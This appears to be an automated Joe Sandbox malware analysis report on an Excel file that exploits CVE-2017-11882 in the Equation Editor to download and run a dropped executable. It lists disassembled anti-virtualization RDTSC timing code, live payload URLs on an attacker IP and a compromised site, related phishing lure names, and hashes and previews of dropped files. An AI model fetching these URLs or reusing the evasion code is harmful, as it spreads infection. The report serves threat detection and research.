    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000276EEA second address: 00000000002773F6 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add eax, FF6DF465h 0x0000000f add eax, 051D0E23h 0x00000014 cmp ch, FFFFFF9Bh 0x00000017 add eax, BB406732h 0x0000001c push ss 0x0000001d pop ss 0x0000001e jmp 00007FD67CF2C9C3h 0x00000020 cmp dword ptr [ebp+0000024Eh], eax 0x00000026 mov eax, dword ptr [ebp+0000024Eh] 0x0000002c jne 00007FD67CF2CA68h 0x00000032 pushad 0x00000033 mov bl, 77h 0x00000035 cmp bl, 00000077h 0x00000038 jne 00007FD67CF2F022h 0x0000003e popad 0x0000003f push 7DDA0CB7h 0x00000044 call 00007FD67CF2CE1Ah 0x00000049 mov eax, dword ptr fs:[00000030h] 0x0000004f mov eax, dword ptr [eax+0Ch] 0x00000052 test cx, ax 0x00000055 mov eax, dword ptr [eax+14h] 0x00000058 mov ecx, dword ptr [eax] 0x0000005a pushad 0x0000005b mov bx, 12CFh 0x0000005f cmp bx, 12CFh 0x00000064 jne 00007FD67CF25C13h 0x0000006a popad 0x0000006b mov eax, ecx 0x0000006d cmp dh, ah 0x0000006f jmp 00007FD67CF2C9C6h 0x00000071 test bh, bh 0x00000073 mov ebx, dword ptr [eax+28h] 0x00000076 test bl, dl 0x00000078 mov dword ptr [ebp+00000238h], edx 0x0000007e pushad 0x0000007f lfence 0x00000082 rdtsc
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000002792DD second address: 00000000002792DD instructions:
    Tries to detect virtualization through RDTSC time measurementsShow sources
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 0000000000276EEA second address: 00000000002773F6 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a add eax, FF6DF465h 0x0000000f add eax, 051D0E23h 0x00000014 cmp ch, FFFFFF9Bh 0x00000017 add eax, BB406732h 0x0000001c push ss 0x0000001d pop ss 0x0000001e jmp 00007FD67CF2C9C3h 0x00000020 cmp dword ptr [ebp+0000024Eh], eax 0x00000026 mov eax, dword ptr [ebp+0000024Eh] 0x0000002c jne 00007FD67CF2CA68h 0x00000032 pushad 0x00000033 mov bl, 77h 0x00000035 cmp bl, 00000077h 0x00000038 jne 00007FD67CF2F022h 0x0000003e popad 0x0000003f push 7DDA0CB7h 0x00000044 call 00007FD67CF2CE1Ah 0x00000049 mov eax, dword ptr fs:[00000030h] 0x0000004f mov eax, dword ptr [eax+0Ch] 0x00000052 test cx, ax 0x00000055 mov eax, dword ptr [eax+14h] 0x00000058 mov ecx, dword ptr [eax] 0x0000005a pushad 0x0000005b mov bx, 12CFh 0x0000005f cmp bx, 12CFh 0x00000064 jne 00007FD67CF25C13h 0x0000006a popad 0x0000006b mov eax, ecx 0x0000006d cmp dh, ah 0x0000006f jmp 00007FD67CF2C9C6h 0x00000071 test bh, bh 0x00000073 mov ebx, dword ptr [eax+28h] 0x00000076 test bl, dl 0x00000078 mov dword ptr [ebp+00000238h], edx 0x0000007e pushad 0x0000007f lfence 0x00000082 rdtsc
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000002773F6 second address: 00000000002774C0 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov edx, 2A63ED14h 0x00000010 cmp ax, dx 0x00000013 xor edx, 8CD6B9A0h 0x00000019 xor edx, 8DA3C863h 0x0000001f cmp eax, ecx 0x00000021 sub edx, 2B169CD7h 0x00000027 test ebx, E044EBDBh 0x0000002d cmp ebx, edx 0x0000002f mov edx, dword ptr [ebp+00000238h] 0x00000035 je 00007FD67CF2C978h 0x0000003b fnop 0x0000003d mov dword ptr [ebp+00000222h], eax 0x00000043 pushad 0x00000044 mov bh, 9Ah 0x00000046 cmp bh, FFFFFF9Ah 0x00000049 jne 00007FD67CF294D2h 0x0000004f popad 0x00000050 mov eax, ebx 0x00000052 push eax 0x00000053 mov eax, dword ptr [ebp+00000222h] 0x00000059 test dl, 0000005Ah 0x0000005c cmp cx, dx 0x0000005f call 00007FD67CF2C957h 0x00000064 pushad 0x00000065 lfence 0x00000068 rdtsc
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000002758DE second address: 000000000027593B instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 sub dword ptr [esp], F2A63F26h 0x0000000a test bx, ax 0x0000000d xor dword ptr [esp], 1168D9BEh 0x00000014 mov dword ptr [ebp+00000148h], 00000000h 0x0000001e add ebx, 04h 0x00000021 mov dword ptr [ebp+0000018Bh], esi 0x00000027 mov esi, ebx 0x00000029 push esi 0x0000002a mov esi, dword ptr [ebp+0000018Bh] 0x00000030 cmp ch, dh 0x00000032 mov dword ptr [ebp+000001E4h], ecx 0x00000038 mov ecx, 785B2C8Ch 0x0000003d test ebx, eax 0x0000003f test bx, bx 0x00000042 xor ecx, C683D913h 0x00000048 cmp dl, 00000035h 0x0000004b add ecx, 3D510807h 0x00000051 sub ecx, FC29FDA7h 0x00000057 pushad 0x00000058 mov esi, 00000084h 0x0000005d rdtsc
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000002792DD second address: 00000000002792DD instructions:
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00275798 rdtsc 6_2_00275798
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1984Thread sleep time: -240000s >= -30000sJump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00275798 rdtsc 6_2_00275798
    Source: C:\Users\Public\vbc.exeCode function: 6_2_0027352B mov eax, dword ptr fs:[00000030h]6_2_0027352B
    Source: C:\Users\Public\vbc.exeCode function: 6_2_00276E4F mov eax, dword ptr fs:[00000030h]6_2_00276E4F
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
    Source: vbc.exe, 00000006.00000002.2355993014.0000000000890000.00000002.00000001.sdmpBinary or memory string: Program Manager
    Source: vbc.exe, 00000006.00000002.2355993014.0000000000890000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
    Source: vbc.exe, 00000006.00000002.2355993014.0000000000890000.00000002.00000001.sdmpBinary or memory string: !Progman

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsExploitation for Client Execution12Path InterceptionProcess Injection12Masquerading111OS Credential DumpingSecurity Software Discovery31Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsExtra Window Memory Injection1Virtualization/Sandbox Evasion1LSASS MemoryVirtualization/Sandbox Evasion1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection12Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol121SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptExtra Window Memory Injection1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery32VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    DB_aabbbkdjdhgdghjdkjdggdghh0x06E5.xlsx30%ReversingLabsWin32.Exploit.CVE-2017-11882

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://180.214.239.39/msexcel/.svchost.exe0%Avira URL Cloudsafe
    https://kinmirai.org/wp-content/bin_NIapfDNXM183.bin0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://180.214.239.39/msexcel/.svchost.exetrue
    • Avira URL Cloud: safe
    		unknown
    https://kinmirai.org/wp-content/bin_NIapfDNXM183.bintrue
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://www.day.com/dam/1.03F47FD52.emf.0.drfalse
      		high

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      180.214.239.39
      		unknownViet Nam
      		135905VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNtrue

      General Information

      Joe Sandbox Version:33.0.0 White Diamond
      Analysis ID:457648
      Start date:02.08.2021
      Start time:07:24:22
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 6m 53s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:DB_aabbbkdjdhgdghjdkjdggdghh0x06E5.xlsx
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:5
      Number of new started drivers analysed:2
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.troj.expl.evad.winXLSX@4/19@0/1
      EGA Information:Failed
      HDC Information:
      • Successful, ratio: 0.4% (good quality ratio 0.4%)
      • Quality average: 55.3%
      • Quality standard deviation: 9.3%
      HCA Information:Failed
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xlsx
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      Show All
      • Exclude process from analysis (whitelisted): dllhost.exe, vga.dll
      • Report size getting too big, too many NtCreateFile calls found.
      • Report size getting too big, too many NtQueryAttributesFile calls found.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      07:25:03API Interceptor70x Sleep call for process: EQNEDT32.EXE modified

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      180.214.239.39Honey Requirment.xlsxGet hashmaliciousBrowse
      • 180.214.239.39/office/.svchost.exe
      Order 001.xlsxGet hashmaliciousBrowse
      • 180.214.239.39/excel/.svchost.exe
      New Order L.P.B.PROMET .xlsxGet hashmaliciousBrowse
      • 180.214.239.39/registry/.svchost.exe
      SC6LHHXO.xlsxGet hashmaliciousBrowse
      • 180.214.239.39/handle/.svchost.exe
      MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsxGet hashmaliciousBrowse
      • 180.214.239.39/process/.svchost.exe
      new order requirment-21 July.xlsxGet hashmaliciousBrowse
      • 180.214.239.39/service/.svchost.exe
      Booking Confirmation.xlsxGet hashmaliciousBrowse
      • 180.214.239.39/network/.svchost.exe
      CMA-CGM BOOKING CONFIRMATION.xlsxGet hashmaliciousBrowse
      • 180.214.239.39/disk/.svchost.exe
      MTIR21487610_0062180102_20210714081247.PDF.xlsxGet hashmaliciousBrowse
      • 180.214.239.39/user/.svchost.exe
      MTIR21487610_0062180102_20210714081247.PDF.xlsxGet hashmaliciousBrowse
      • 180.214.239.39/cpu/.svchost.exe
      Booking Confirmation.xlsxGet hashmaliciousBrowse
      • 180.214.239.39/port/.svchost.exe
      6306093940.xlsxGet hashmaliciousBrowse
      • 180.214.239.39/ssh/.svchost.exe
      6306093940.xlsxGet hashmaliciousBrowse
      • 180.214.239.39/mssn/.svchost.exe

      Domains

      No context

      ASN

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVNUv8DxVYVYv.exeGet hashmaliciousBrowse
      • 103.99.1.60
      SKM_C258201001130020005057.jarGet hashmaliciousBrowse
      • 103.133.104.124
      NCL_Mandatory_Form.vbsGet hashmaliciousBrowse
      • 103.147.184.73
      HR-Ageing-Report.pptGet hashmaliciousBrowse
      • 103.99.1.60
      IYzibmBbKH.exeGet hashmaliciousBrowse
      • 103.99.1.60
      02_extracted.exeGet hashmaliciousBrowse
      • 103.99.1.60
      Honey Requirment.xlsxGet hashmaliciousBrowse
      • 180.214.239.39
      Order 001.xlsxGet hashmaliciousBrowse
      • 180.214.239.39
      New Order EF56446.xlsxGet hashmaliciousBrowse
      • 180.214.236.151
      New Order L.P.B.PROMET .xlsxGet hashmaliciousBrowse
      • 180.214.239.39
      HANYUAN PROJECT SDN BHD _PRJ S2505.xlsxGet hashmaliciousBrowse
      • 180.214.236.151
      SC6LHHXO.xlsxGet hashmaliciousBrowse
      • 180.214.239.39
      SWIFT COPY.xlsxGet hashmaliciousBrowse
      • 103.140.250.43
      Statement SKBMT 01578.exeGet hashmaliciousBrowse
      • 103.133.109.176
      Inquiry B86001 -02.xlsxGet hashmaliciousBrowse
      • 180.214.236.151
      M63bK9bxPtGet hashmaliciousBrowse
      • 14.225.234.82
      payment detail.xlsxGet hashmaliciousBrowse
      • 103.140.250.43
      DHL 07988 AWB 20210798.xlsxGet hashmaliciousBrowse
      • 180.214.236.151
      MILKA CHOCO COW BISCUITS AND CADBURY OFFERS,TWIX,SNICKERS,BOUNTY,GALAXY.xlsxGet hashmaliciousBrowse
      • 180.214.239.39
      DHL 07988 AWB 202107988.xlsxGet hashmaliciousBrowse
      • 180.214.236.151

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\.svchost[1].exe
      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
      Category:downloaded
      Size (bytes):259192
      Entropy (8bit):4.6012516392465255
      Encrypted:false
      SSDEEP:1536:2blgLWMXncWYqmOeDA6W6h8eaBWTvYeigJ2cI6wt:NLWMXntzVAA6W6GwZJgt
      MD5:9318CD06A9A0B788DC043A63C97D4FCE
      SHA1:A296EA3E1CF6D41F9D059D7D6E5058882B03161A
      SHA-256:7AD18B09938D40E8EC342EE6BEE6B190A986FFEDCE7567A638B8D25B4098CB69
      SHA-512:DA057BF10D5A7AE8863DD0310B3D4116AF6535AACC68074C9C301E79F580860C2CECBA991628D274D62E029EE210F92705C12125DC390072556CA031A16CD4B3
      Malicious:true
      Reputation:low
      IE Cache URL:http://180.214.239.39/msexcel/.svchost.exe
      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y....................................Rich............PE..L.....zY.................@...................P....@.................................eR......................................$F..(....`...p..........X... ...................................................(... ....................................text...d:.......@.................. ..`.data........P.......P..............@....rsrc....p...`.......`..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\23E0E888.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 458 x 211, 8-bit/color RGB, non-interlaced
      Category:dropped
      Size (bytes):11303
      Entropy (8bit):7.909402464702408
      Encrypted:false
      SSDEEP:192:O64BSHRaEbPRI3iLtF0bLLbEXavJkkTx5QpBAenGIC1bOgjBS6UUijBswpJuaUSt:ODy31IAj0bL/EKvJkVFgFg6UUijOmJJN
      MD5:9513E5EF8DDC8B0D9C23C4DFD4AEECA2
      SHA1:E7FC283A9529AA61F612EC568F836295F943C8EC
      SHA-256:88A52F8A0BDE5931DB11729D197431148EE9223B2625D8016AEF0B1A510EFF4C
      SHA-512:81D1FE0F43FE334FFF857062BAD1DFAE213EED860D5B2DD19D1D6875ACDF3FC6AB82A43E46ECB54772D31B713F07A443C54030C4856FC4842B4C31269F61346D
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview: .PNG........IHDR..............P.l....sRGB.........gAMA......a.....pHYs...t...t..f.x..+.IDATx...|.e............{......z.Y8..Di*E.4*6.@.$$....+!.T.H/..M6..RH.l.R.!AC...>3;3;..4..~...>3.<.<..7.<3..555........c...xo.Z.X.J...Lhv.u.q..C..D......-...#n...!.W..#...x.m..&.S........cG.... s..H.=......,...(((HJJR.s..05J...2m.....=..R..Gs....G.3.z..."............(..1$..)..[..c&t..ZHv..5....3#..~8....Y...............e2...?.0.t.R}ZI..`.&.......rO..U.mK..N.8..C...[..\....G.^y.U.....N.....eff.....A....Z.b.YU....M.j.vC+\.gu..0v..5...fo.....'......^w..y....O.RSS....?.."L.+c.J....ku$._...Av...Z...*Y.0.z..zMsrT.:.<.q.....a.......O.....$2.=|.0.0..A.v..j....h..P.Nv......,.0....z=...I@8m.h.:]..B.q.C.......6...8qB......G\.."L.o..[)..Z.XuJ.pE..Q.u.:..$[K..2.....zM=`.p.Q@.o.LA../.%....EFsk:z...9.z......>z..H,.{{{...C....n..X.b....K.:..2,...C....;.4....f1,G.....p|f6.^._.c..'''Qll..........W.[..s..q+e.:.|..(....aY..yX....}...n.u..8d...L...:B."zuxz..^..m;p..(&&....
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2459FEE9.jpeg
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
      Category:dropped
      Size (bytes):7006
      Entropy (8bit):7.000232770071406
      Encrypted:false
      SSDEEP:96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
      MD5:971312D4A6C9BE9B496160215FE59C19
      SHA1:D8AA41C7D43DAAEA305F50ACF0B34901486438BE
      SHA-256:4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
      SHA-512:618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
      Malicious:false
      Reputation:low
      Preview: ......JFIF..............Exif..MM.*......@......../..@..................C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\31B846BE.jpeg
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2], baseline, precision 8, 474x379, frames 3
      Category:dropped
      Size (bytes):7006
      Entropy (8bit):7.000232770071406
      Encrypted:false
      SSDEEP:96:X/yEpZGOnzVjPyCySpv2oNPl3ygxZzhEahqwKLBpm1hFpn:PyuZbnRW6NPl3yqEhwK1psvn
      MD5:971312D4A6C9BE9B496160215FE59C19
      SHA1:D8AA41C7D43DAAEA305F50ACF0B34901486438BE
      SHA-256:4532AEED5A1EB543882653D009593822781976F5959204C87A277887B8DEB961
      SHA-512:618B55BCD9D9533655C220C71104DFB9E2F712E56CDA7A4D3968DE45EE1861267C2D31CF74C195BF259A7151FA1F49DF4AD13431151EE28AD1D3065020CE53B5
      Malicious:false
      Reputation:low
      Preview: ......JFIF..............Exif..MM.*......@......../..@..................C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......{...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3F47FD52.emf
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
      Category:dropped
      Size (bytes):648132
      Entropy (8bit):2.8123883877939457
      Encrypted:false
      SSDEEP:3072:j34UL0tS6WB0JOqFB5AEA7rgXuzqn8nG/qc+5:L4UcLe0JOcXuunhqcS
      MD5:62E3F94AAC964ECB9508782BDAC02CD0
      SHA1:BA8AE2F6307F62243DED764BA344536FD28FEC07
      SHA-256:A3CEB693C1517EE4354D33B61AAD28FF47F05285AB12D3C3B0472EE6D8DFDCCC
      SHA-512:83682C424FD47301012119BB93F735481BFB06B6DE4C3B652EBD6C1159C43EDE013E0E45076DBC23BB19FD5A1EFF663E081EA1C93E7E47D0279FDA0789184A7B
      Malicious:false
      Reputation:low
      Preview: ....l...........................m>...!.. EMF........(...............................................\K..hC..F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@......................................................%...........%...................................R...p................................@."C.a.l.i.b.r.i......................................................X$......-z.X.@..%.............X......N6ZX..P.........<...N6ZX..P.. ....y.XP..X.. .........&..z.X............O...........................%...X...%...7...................{$..................C.a.l.i.b.r.i..............X...P...........&....vdv......%...........%...........%...........!..............................."...........%...........%...........%...........T...T..........................@.E.@............L.......................P... .x.6...F...$.......EMF+*@..$..........?...........?.........@...........@..........*@..$..........?....
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3FB96E45.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 687 x 111, 8-bit colormap, non-interlaced
      Category:dropped
      Size (bytes):2493
      Entropy (8bit):7.758903050821124
      Encrypted:false
      SSDEEP:48:F9quw7IIfnKFZR4r5vB4FRLiWWl4sXhGI4Y9E5ZBZ7CK0lrC:nQHO34r5vB4F7Wu6zGXZG/pC
      MD5:A5D66CCBEE7946308A985B0FA9CC74F7
      SHA1:D86FFD2A310B16C59849B8E574B673E36643FDDF
      SHA-256:6B8E5D3AFEA87B138C1084837085EDFF6D74B5001E92897CE6FF087058204B28
      SHA-512:7C65B24A8A88B88831CCF9089B89946FCC26748DB226488155899D73F7B63EAF32424432A66D78B385DED8381A66E2207EE6BF197D6BC550DDD222D323B73D98
      Malicious:false
      Reputation:moderate, very likely benign file
      Preview: .PNG........IHDR.......o........2...qPLTE.............x.....`.5......5...``.......5..........`.......f.:.5..5.`.`...5..._...55........t.`.`......``4.....Z...U...\.9Z.3f...c.....n..X..N.44....f..:...\...`...:.f..f.:......<v......e:......d5.`.f..\....`````5444\..Z...........Z.....3...4_.78..8.f.f.45..3.5.........3....-l..Z.:.....:.:\.......4..]4..3..7c[._ff:.::.955....:..:.....d3ZZ:::.`5.U......IDATx...=O.P..an.p'.s.q0 I[5....c`.d.....t..{zhm...-.$...@.....q....K....+,.WXB...^a....z...=.z.F...X.E7....(.:.{...px...W..^..N..g....S.c...r.W.CK.s...[*Kv.-5..^.:.f..^.../..BQ....H.~H...[.v./f..y.e..Y.Y.}.CB...`..6{...mz..J.z.O../.m&uV......y._...g)...^..|..Zl..2>.M..c...<..h..~...^..<....i.K..-|.........[A.Ke....sT..H..Z..y`..+v..Vp...U..H6z..J........._...,.S.....t...[..^a....z.%..K....+,.WXB...^a.................`.....Kq7..w....\...'..'....b.......Q#.j.!.,.c..#A..J..^..P%J..^.m.K.=..w.<..k.,..>..w=.v...Y...........&......r.kX-.%6.S..U.B.|........0.
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\48845B4D.png
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:PNG image data, 566 x 429, 8-bit/color RGBA, non-interlaced
      Category:dropped
      Size (bytes):84203
      Entropy (8bit):7.979766688932294
      Encrypted:false
      SSDEEP:1536:RrpoeM3WUHO25A8HD3So4lL9jvtO63O2l/Wr9nuQvs+9QvM4PmgZuVHdJ5v3ZK7+:H5YHOhwx4lRTtO6349uQvXJ4PmgZu11J
      MD5:208FD40D2F72D9AED77A86A44782E9E2
      SHA1:216B99E777ED782BDC3BFD1075DB90DFDDABD20F
      SHA-256:CBFDB963E074C150190C93796163F3889165BF4471CA77C39E756CF3F6F703FF
      SHA-512:7BCE80FFA8B0707E4598639023876286B6371AE465A9365FA21D2C01405AB090517C448514880713CA22875013074DB9D5ED8DA93C223F265C179CFADA609A64
      Malicious:false
      Preview: .PNG........IHDR...6...........>(....sRGB.........gAMA......a.....pHYs..........+......IDATx^.=v\9..H..f...:ZA..,'..j.r4.........SEJ,%..VPG..K.=....@.$oI.e7....U...... ....>n~&..._..._.rg....L...D.G!0..G!;...?...Oo.7....Cc...G....g>......_o..._._.}q...k.....ru..T.....S.!....~..@Y96.S.....&..1.:....o...q.6..S...'n..H.hS......y;.N.l.)."[ `.f.X.u.n.;........._h.(.u|0a.....].R.z...2......GJY|\..+b...{>vU.....i...........w+.p...X..._.V.-z..s..U..cR..g^..X......6n...6....O6.-.AM.f.=y ...7...;X....q..|...=.|K...w...}O..{|...G........~.o3.....z....m6...sN.0..;/....Y..H..o............~........(W.`...S.t......m....+.K...<..M=...IN.U..C..].5.=...s..g.d..f.<Km..$..fS...o..:..}@...;k..m.L./.$......,}....3%..|j.....b.r7.O!F...c'......$...)....|O.CK...._......Nv....q.t3l.,. ....vD.-..o..k.w.....X...-C..KGld.8.a}|..,.....,....q.=r..Pf.V#.....n...}........[w...N.b..W......;..?.Oq..K{>.K.....{w{.......6'/...,.}.E...X.I.-Y].JJm.j..pq|.0...e.v......17...:F
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\542157E3.jpeg
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 150x150, segment length 16, baseline, precision 8, 1275x1650, frames 3
      Category:dropped
      Size (bytes):85020
      Entropy (8bit):7.2472785111025875
      Encrypted:false
      SSDEEP:768:RgnqDYqspFlysF6bCd+ksds0cdAgfpS56wmdhcsp0Pxm00JkxuacpxoOlwEF3hVL:RUqQGsF6OdxW6JmPncpxoOthOip
      MD5:738BDB90A9D8929A5FB2D06775F3336F
      SHA1:6A92C54218BFBEF83371E825D6B68D4F896C0DCE
      SHA-256:8A2DB44BA9111358AFE9D111DBB4FC726BA006BFA3943C1EEBDA5A13F87DDAAB
      SHA-512:48FB23938E05198A2FE136F5E337A5E5C2D05097AE82AB943EE16BEB23348A81DA55AA030CB4ABCC6129F6EED8EFC176FECF0BEF4EC4EE6C342FC76CCDA4E8D6
      Malicious:false
      Preview: ......JFIF.............C....................................................................C.......................................................................r...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(...(..